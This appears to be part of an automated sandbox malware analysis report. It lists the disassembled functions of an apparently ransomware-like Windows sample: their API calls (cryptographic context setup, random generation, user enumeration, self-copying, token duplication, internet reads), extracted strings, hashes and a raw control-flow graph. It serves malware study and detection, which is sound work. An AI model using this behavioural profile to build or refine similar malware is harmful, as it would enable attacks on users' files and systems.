                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Length
                                          • String ID: !$P$asykat$asykat$k2ba8v$r1d8la$w#G!
                                          • API String ID: 1006428111-663365838
                                          • Opcode ID: 0a9182d3efff5e4631077362ea0be1286a23775a1c9f4d7b9eb7bd4ae2846bdd
                                          • Instruction ID: 75c50ceb0bef0c8b068eac9e18a3292458806daa3331a11343904e59e4b0f248
                                          • Opcode Fuzzy Hash: 0a9182d3efff5e4631077362ea0be1286a23775a1c9f4d7b9eb7bd4ae2846bdd
                                          • Instruction Fuzzy Hash: D0A2CF70E102589FEB24DF68CD94FDEBBB5AF85304F10829DE409A7291DB74AA84CF51
                                          Function 00A14230 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 123encryptionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,21472377,00AD9528,?,00000000), ref: 00A14275
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00A8C5D8,000000FF,?,00A14970), ref: 00A1427B
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00A1428F
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00A142A0
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00A8C5D8,000000FF), ref: 00A142C5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A142F4
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00A14342
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
                                          • String ID: CryptAcquireContext$Crypto++ RNG$w#G!
                                          • API String ID: 636621833-3832095453
                                          • Opcode ID: 91f2c1ad14c32109d077e6dcb7ac54e98919fb26362f4a18c0515a4a3ebf34b0
                                          • Instruction ID: 2d77c883f4d7f96b90f910cec05268bbdd7b0e705cb53345cf129a687463dec0
                                          • Opcode Fuzzy Hash: 91f2c1ad14c32109d077e6dcb7ac54e98919fb26362f4a18c0515a4a3ebf34b0
                                          • Instruction Fuzzy Hash: D0415172A44709ABDB10DF99DC41F9AB7FCFF48710F10462AF515A7680EBB5A9048B60
                                          Function 009C0239 Relevance: 12.2, Strings: 8, Instructions: 2204COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $1234567891234567$@$U12H6AN==$_Enc$_[ID-$nqpso5938fh71jfu$w#G!
                                          • API String ID: 0-1974628941
                                          • Opcode ID: 252fe6758678752d731f79c6eedbb612727a36692129036a46b5df3c1046f459
                                          • Instruction ID: 2b5c52896fda03f92a13b118caaad8402f728d12974a618747c861b5aaca95fb
                                          • Opcode Fuzzy Hash: 252fe6758678752d731f79c6eedbb612727a36692129036a46b5df3c1046f459
                                          • Instruction Fuzzy Hash: 0E13BD70E00258CFDB28DB64CD95BDDB7B9AF86304F10829DE049A7292DB749E84CF56
                                          Function 009C5920 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PathIsNetworkPathA.SHLWAPI(?,00AAAABC,?,?,?,21472377), ref: 009C59A7
                                          • __alloca_probe_16.LIBCMT ref: 009C59D7
                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,21472377), ref: 009C59F1
                                          • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,21472377), ref: 009C5A0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                          • String ID: w#G!
                                          • API String ID: 592574438-519468572
                                          • Opcode ID: d3f4931718aae67055ec0b7c5b91a8dea2fc0aa356a4d50ae968bcc5fa26966e
                                          • Instruction ID: eea0fd752c8c0a0f789d56a9f10bf89015e4b25c9484d42376aa222061e9b0de
                                          • Opcode Fuzzy Hash: d3f4931718aae67055ec0b7c5b91a8dea2fc0aa356a4d50ae968bcc5fa26966e
                                          • Instruction Fuzzy Hash: 6751BD71A00609DFDB18CFA9C980FAEB7B9FF44310F55826DE81297291EB31AD85CB51
                                          Function 009C4500 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                          Download Yara Rule
                                          APIs
                                          • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,21472377), ref: 009C4565
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: BufferFree$EnumUser
                                          • String ID: Default$w#G!
                                          • API String ID: 2592758740-3442755388
                                          • Opcode ID: 036441669494c8205af89ef94dac3834087d7ce12cef60a9d0a731c58c06a486
                                          • Instruction ID: dbd0489ee3ef693cd0dbea7655e72c16055a92bed6981db4562cfc3ff8bd9808
                                          • Opcode Fuzzy Hash: 036441669494c8205af89ef94dac3834087d7ce12cef60a9d0a731c58c06a486
                                          • Instruction Fuzzy Hash: 6E416075E002599BDB14CF98C994FEEB7F8EB59710F10462EE812B3290DB35AE04CB95
                                          Function 00A14900 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00A14980
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A1499F
                                            • Part of subcall function 00A14390: GetLastError.KERNEL32(00000010,21472377,7508FC30,?), ref: 00A143E0
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A14A0A
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                                          • String ID: CryptGenRandom$w#G!
                                          • API String ID: 1600773198-1156935335
                                          • Opcode ID: 0799607601b4859c0187e1cbc7af57370789473ab93cce31167ffd4efcc3e8c8
                                          • Instruction ID: 56947ae4dceb8e80cec61c1ca1bd3b8fd6aabe5469f370700e61f0ade24544ae
                                          • Opcode Fuzzy Hash: 0799607601b4859c0187e1cbc7af57370789473ab93cce31167ffd4efcc3e8c8
                                          • Instruction Fuzzy Hash: CD318171A00248AFDF10DFA4D945BEEBBB8FF09714F140169E911AB281DB746A49CB61
                                          Function 009C36F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 009C3733
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID: user$user$w#G!
                                          • API String ID: 2645101109-2410236406
                                          • Opcode ID: 3a54b5375d5eaabf12792e5d1e6bcb55743a8e6531740d161d9a3fe07a2697ab
                                          • Instruction ID: b1fdef38d75cf859a4f864da9f3d09ca7cd0adfdc954749a6cd50d46b114172c
                                          • Opcode Fuzzy Hash: 3a54b5375d5eaabf12792e5d1e6bcb55743a8e6531740d161d9a3fe07a2697ab
                                          • Instruction Fuzzy Hash: 0A416A71E1011D9BDB25DB64CD98BDEB7B9EB58300F2086D9E409A7290DB38AB84CF51
                                          Function 009C6808 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163filenetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 009C6821
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID: `
                                          • API String ID: 778332206-3189776409
                                          • Opcode ID: cd3535357de546cd569dd1284f2bfde3cd0df0822820c174ea7eabd9bd3a37fd
                                          • Instruction ID: c1b9735dce68078c9d4874e394138eaed8f81cb0f1c0342272f7cd05addc9e3f
                                          • Opcode Fuzzy Hash: cd3535357de546cd569dd1284f2bfde3cd0df0822820c174ea7eabd9bd3a37fd
                                          • Instruction Fuzzy Hash: 7251A2B1E101298BEB28CF24CD84B9DB7B5EF85304F10829DE60997291D735AEC8CF59
                                          Function 00A147F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A1487A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID: w#G!
                                          • API String ID: 829835001-519468572
                                          • Opcode ID: 0dea4e6f7d865a1b26d3f7fd567770e992c92ec7a641627877c771ecf6149ef7
                                          • Instruction ID: 5acaac24c06610a1a27ad4b6fd33e4820c066ed36bb282c07a0e884e4f56a375
                                          • Opcode Fuzzy Hash: 0dea4e6f7d865a1b26d3f7fd567770e992c92ec7a641627877c771ecf6149ef7
                                          • Instruction Fuzzy Hash: 2121E571A04260ABD724DF9CDD41F9EB3A8EB88B50F00072BFE16D3390E774A801C691
                                          Function 009B1960 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextRandomRelease__onexit
                                          • String ID: w#G!
                                          • API String ID: 2784917694-519468572
                                          • Opcode ID: 0ffa73e7bd30546a8a19518fc3717dc449bb81da75bd7fef11cf147de6d180e1
                                          • Instruction ID: 5d71ebe50f6149dd25d8fd0f533648e976f760e8b4d98506c7f7ad8a1ded9b8b
                                          • Opcode Fuzzy Hash: 0ffa73e7bd30546a8a19518fc3717dc449bb81da75bd7fef11cf147de6d180e1
                                          • Instruction Fuzzy Hash: 28F0A0B5A84648EBC701DFC4ED52F9AB7E8F708B10F00067AEA16977C0DA7665048785
                                          Function 009DC27C Relevance: 63.5, APIs: 5, Strings: 31, Instructions: 509fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3784 9dc27c 3785 9dc281-9dc329 call 9e90a0 * 3 3784->3785 3786 9dc27c call 9d7c10 3784->3786 3796 9dc32f-9dc343 3785->3796 3797 9dc422-9dc44e call 9b8780 call 9e13c0 3785->3797 3786->3785 3799 9dc345-9dc348 3796->3799 3800 9dc382-9dc385 3796->3800 3814 9dc454-9dc50b call 9e13c0 * 2 call 9e1360 call 9e9040 call 9e9580 call 9e1ac0 * 2 call 9e1660 call 9b8780 call 9e1ac0 * 2 3797->3814 3815 9dc510-9dc852 call 9c2870 GetModuleFileNameW call 9e1260 call 9c36f0 call 9c3590 call 9e11d0 call 9b49c0 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9d3dd0 call 9b8780 call 9e13c0 call 9e12d0 call 9c3100 3797->3815 3804 9dc350-9dc35a 3799->3804 3801 9dc387-9dc38a 3800->3801 3802 9dc3c2-9dc3c5 3800->3802 3805 9dc390-9dc39a 3801->3805 3806 9dc3fd-9dc41c SetErrorMode SetConsoleTitleW call 9c58e0 3802->3806 3807 9dc3c7-9dc3ca 3802->3807 3804->3804 3809 9dc35c-9dc37d 3804->3809 3805->3805 3810 9dc39c-9dc3bd 3805->3810 3806->3797 3820 9de585-9de5a2 call a405bb 3806->3820 3811 9dc3d0-9dc3da 3807->3811 3809->3800 3810->3802 3811->3811 3816 9dc3dc-9dc3f9 3811->3816 3814->3815 3940 9dc854-9dc85b 3815->3940 3941 9dc8b6-9dc8cb call 9c5d90 * 2 3815->3941 3816->3806 3940->3941 3943 9dc85d-9dc864 3940->3943 3950 9dc8cd-9dc8ec call 9c5d90 * 2 3941->3950 3951 9dc8f2-9dca02 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e1a90 call 9b8a80 call 9e11d0 call 9b49c0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9b8a80 call 9e9d90 call 9e11d0 call 9b49c0 * 2 call 9c4500 call 9e12b0 3941->3951 3943->3941 3945 9dc866-9dc872 call 9eafa0 3943->3945 3945->3941 3952 9dc874-9dc8b3 call 9e12d0 * 2 call 9b92a0 3945->3952 3950->3951 3997 9dca04-9dca06 3951->3997 3952->3941 3998 9dca0c-9dcaca call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 call 9e12d0 call 9b4a20 call 9b49c0 3997->3998 3999 9dcad8-9dcb15 call 9e12d0 call 9b4a20 call 9b49c0 3997->3999 3998->3999 4066 9dcacc-9dcad3 3998->4066 4012 9dcb17-9dcb8d call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 3999->4012 4013 9dcb92-9dcbb5 call 9e9b40 3999->4013 4012->4013 4021 9dcbbc-9dcbf0 call 9e12d0 call 9b4a20 4013->4021 4022 9dcbb7 call 9d0fa0 4013->4022 4039 9dcc32 4021->4039 4040 9dcbf2-9dcc30 call 9e12d0 call 9b4a20 4021->4040 4022->4021 4045 9dcc39-9dcc41 4039->4045 4040->4039 4040->4045 4049 9dcc5d-9dcc7f call 9b49c0 4045->4049 4050 9dcc43-9dcc57 call 9b49c0 4045->4050 4061 9dd02b-9dd1f1 call a58980 call 9e37b0 call 9e9130 call 9b3730 call 9e3740 call a58980 call 9c5e60 call 9f5c80 call a58980 call 9de5b0 call a58980 call 9de750 call 9e0230 call 9f2590 call 9e0230 call 9f23c0 4049->4061 4062 9dcc85-9dccc2 call 9e12d0 call 9b4a20 call 9b49c0 4049->4062 4050->4049 4137 9dd1f7-9dd200 4061->4137 4078 9dccc4-9dccd1 call 9e11a0 4062->4078 4079 9dccd6-9dccdc 4062->4079 4066->3997 4078->4079 4083 9dcce0-9dccfb call 9e12d0 call 9baed0 4079->4083 4092 9dcd0d-9dd026 call a58980 call 9e3b00 call 9e0cc0 call 9eae30 call 9e3a90 call 9e1bd0 * 2 call 9e1400 * 2 call 9e1360 call 9e1b10 call 9e1ac0 call 9e1360 call 9e1b10 call 9e1ac0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e1170 call 9e11a0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e11a0 call 9b7fe0 call 9e1b10 call 9e1ac0 call 9e1a60 call 9e1a90 call 9e1ac0 call 9b49c0 call 9e1ac0 call 9b49c0 call 9e1ac0 * 4 call 9bac80 4083->4092 4093 9dccfd 4083->4093 4273 9dd82e-9dd891 call a58980 call 9b76c0 call 9f1ba0 call 9e1260 call 9e0e90 4092->4273 4095 9dccff-9dcd02 4093->4095 4096 9dcd04-9dcd0b Sleep 4093->4096 4095->4092 4095->4096 4096->4083 4137->4137 4139 9dd202-9dd26e call 9b7e30 call 9e1b10 call 9e1ac0 call 9e1360 * 2 4137->4139 4161 9dd270-9dd279 4139->4161 4161->4161 4163 9dd27b-9dd291 call 9e1a90 4161->4163 4169 9dd297-9dd2a0 4163->4169 4169->4169 4171 9dd2a2-9dd2c1 call 9c3f00 4169->4171 4178 9dd2c6-9dd2cf 4171->4178 4178->4178 4180 9dd2d1-9dd30a call 9e95d0 call 9e1b10 call 9e1ac0 4178->4180 4193 9dd310-9dd319 4180->4193 4193->4193 4195 9dd31b-9dd825 call 9e1c10 call 9b7e30 call 9e1b10 call 9e1ac0 call a58980 call 9e37b0 call 9e8f40 call 9e9580 call 9e9470 call 9b3730 call 9e1ac0 * 2 call 9e3740 call 9e10a0 call 9e10c0 call 9ea4d0 call a58980 call 9e37b0 call 9e9490 call 9e9470 call 9e1ac0 call 9e9490 call 9e9470 call 9e1ac0 call 9e3740 call 9e1c10 call 9c4670 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call a58980 call 9e3b00 call 9b3730 call 9e3a90 call 9e12d0 call 9d1c90 call 9bac80 call 9b49c0 call 9e1ac0 * 2 call 9bb040 call 9e1ac0 call 9bb040 call 9e1ac0 * 5 call 9b7d70 call 9c6020 * 2 4193->4195 4195->4273 4417 9dd829 call 9bb040 4195->4417 4296 9dd8a3-9ddba9 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 10 call 9e1bd0 call 9e1660 call a65282 call 9e1bd0 call 9e1660 call a65282 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 8 call 9e90a0 4273->4296 4297 9dd893-9dd89e call 9e1170 4273->4297 4449 9ddbaf-9ddbc0 call 9bf5e0 4296->4449 4450 9ddd17-9ddd28 call 9e90a0 4296->4450 4297->4296 4417->4273 4457 9de4a4-9de580 call 9b8780 call 9e1ac0 * 3 call 9b49c0 call 9b78d0 call 9b49c0 * 2 call 9e1ac0 * 8 call 9b49c0 * 3 call 9e1ac0 4449->4457 4458 9ddbc6-9ddcb7 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9b49c0 * 5 call 9e1090 * 2 call a659c6 4449->4458 4455 9ddd2e-9de0a3 call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 4450->4455 4456 9de450-9de461 call 9e90a0 4450->4456 4647 9de0a9-9de42f call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9b5240 * 2 4455->4647 4648 9de434-9de44e call 9b5240 * 2 4455->4648 4469 9de491-9de49d call 9cf570 4456->4469 4470 9de463-9de478 call 9cdaf0 * 2 4456->4470 4457->3820 4561 9ddcb9-9ddd00 call 9e9c70 call 9e11d0 call 9b49c0 call 9e1090 * 2 call a659c6 4458->4561 4562 9ddd03-9ddd12 call 9b49c0 4458->4562 4469->4457 4485 9de49f 4469->4485 4470->4457 4493 9de47a-9de48f call 9cdaf0 * 2 4470->4493 4485->4457 4490 9de49f call 9cf570 4485->4490 4490->4457 4493->4457 4561->4562 4562->4457 4647->4648 4648->4457
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 009DC3FF
                                          • SetConsoleTitleW.KERNEL32(asykat), ref: 009DC40A
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 009DC523
                                          • CopyFileW.KERNEL32(00000000,00000000,00000000,00A8945D,000000FF), ref: 009DC5E3
                                          • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 009DC65D
                                            • Part of subcall function 009D3DD0: GetCurrentThread.KERNEL32 ref: 009D3E13
                                            • Part of subcall function 009D3DD0: OpenThreadToken.ADVAPI32(00000000), ref: 009D3E1A
                                            • Part of subcall function 009D3DD0: GetLastError.KERNEL32 ref: 009D3E24
                                            • Part of subcall function 009D3DD0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 009D3E3B
                                            • Part of subcall function 009D3DD0: OpenProcessToken.ADVAPI32(00000000), ref: 009D3E42
                                            • Part of subcall function 009D3DD0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 009D3E59
                                            • Part of subcall function 009D3DD0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009D3E84
